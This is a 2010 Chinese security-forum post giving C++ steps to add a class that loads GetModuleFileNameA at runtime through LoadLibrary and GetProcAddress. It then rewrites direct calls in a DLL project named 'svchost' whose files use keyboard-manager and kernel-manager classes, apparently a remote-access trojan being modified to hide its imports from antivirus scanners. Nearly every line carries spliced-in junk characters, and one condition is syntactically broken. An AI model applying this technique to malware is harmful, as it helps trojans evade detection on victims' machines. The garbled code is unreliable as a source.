标题: [原创文章] 全局动态调用 [打印本页]

---

作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记6 a& {3 M! }% ^  c7 Y
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h. f/ t. P0 L# e# ^# W. `% l
----------------------------------------  l# y! j2 I3 M0 b
DTDY.h：- p3 {2 t3 [" ^" Z6 l) n, ^

# p0 e! i2 a: m#if _MSC_VER>1000
% u6 m+ ^  w7 o' `# q+ q- T#pragma once
& P. s7 P3 o! Z2 E0 _$ W( L: G9 C#endif //_MSC_VER>1000
- `7 @5 p$ d  T8 \# g#include<windows.h>: G. E  w: e, G# Q$ @9 }% k

# U! S7 X( S0 t' l8 u# b; m( Mtypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);/ X- c6 X) Y* C" M5 U
class DTDY3 z3 g0 G9 ^" E3 w, r( M
{
! c( y: \0 t; y2 @3 _* zpublic:
7 a7 z5 j( j6 Z8 ?: G6 ?. p: ADTDY();
- Q9 ~. l! D; y7 k) H8 K1 Cvirtual ~DTDY();( m$ n' w2 u) L5 W
public:) ^9 T9 v: n& B# B$ |, L* d! `- D
static pGetModuleFileNameA MyGetModuleFileName;
6 K) |  w+ d3 S. D3 }static BOOL FunInitiallization();2 O6 J6 ~% v% Y
};5 N' m4 K, K- w9 ~& _1 p& O$ f. P
#endif  U3 }$ P7 r# B; b7 `
----------------------------------------' N# h! @, B0 {: }! j
2 S9 j8 C+ Z( y  y
DTDY.cpp:
- J) N& F3 y' {+ Q
1 V) A" @  D* d1 a" g#include "DTDY.h"" m9 u  S. |  H/ v4 f4 C
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;, `7 q' j# |1 a! K6 c( T) c+ `# W
DTDY:TDY()
' x# P  `- X# A0 ^4 V6 p3 v  d& z{
/ Y% I" t* ~. X. y}
- ~* _5 t8 G6 q1 b0 k9 LDTDY::~DTDY()
9 p7 Q7 ]' v  y{
3 ^5 Y3 U& I$ }  _}
5 W2 f+ x. {5 uBOOL DTDY::FunInitiallization()
+ v+ K% W$ A. N{
! J! _' _; g& T6 eHMODULE hModule=LoadLibrary("kernel32.dll");
( p% H- v! V) G. N0 nMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");7 C! H5 X4 ^+ h( t5 J) \5 @1 F
if(!MyGetModuleFileName=) return FALSE;  E/ X' O1 W4 |) _. t8 |
& _9 L4 S. [/ Y7 a# j$ o  y
return TRUE;8 R* l% B. C+ ]( _1 m
}8 t, d! I9 `, D7 P7 P
----------------------------------------$ n: [# F* ], v; ?+ D0 T
svchost.cpp:+ l# c, t# l- x$ b1 C1 ?
" Z3 p: t5 r# n6 T" f. D
#include "DTDY.h"
7 B4 b  _8 v: q. Z$ o' s+ ^* y; j6 L/ \/ X/ l
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
6 |2 O/ e& `) |. I{
1 h+ K( L  R" H8 b$ {switch(ul_reason_for_call)
5 E; F. J# t! g- e. Y6 ?5 c2 X4 O/ h{
8 t# z) X" g, k% Z# }' |7 M2 C3 a1 B& Ccase DLL_PROCESS_ATTACH:
; V: N8 p2 A! X+ Q4 h6 Jif(!DTDY::FunInitiallization()) return FALSE;
# N$ `' V  a, C2 i+ `+ ?
5 Q/ b" `4 j8 a; k5 |! lbreak;
) L3 x. {& Y4 r7 a4 v! s}/ S: b+ J% E) B$ h
}. F# J$ k" }0 L4 J: y

$ D0 Z, [5 W2 _2 Z- `: d) M
% ]! \" Z- V8 U' t) e4 s0 u+ ~( UGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
, j, ~% k' B, Q: V) J' Y, `7 C改写为
) Y- j  v: J0 k  M  O1 bDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));+ D: x# F3 ]. ]! i0 U3 u) }; ]
----------------------------------------
( t" d6 H5 Z) y! m: A) V. b( r$ j+ g6 RKernelManager.cpp:
' ]) N  K1 b# L
) q* f) d, P2 y3 l0 z0 T: }1 X#include "../DTDY.h"
# ~  Q" P# h- Z8 ?" `GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));& |$ x* @2 H/ j2 f
改写为
$ z( C5 j* h' \7 h& lDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));7 {8 S! c% C5 j
----------------------------------------

---

欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)

Powered by Discuz! 7.2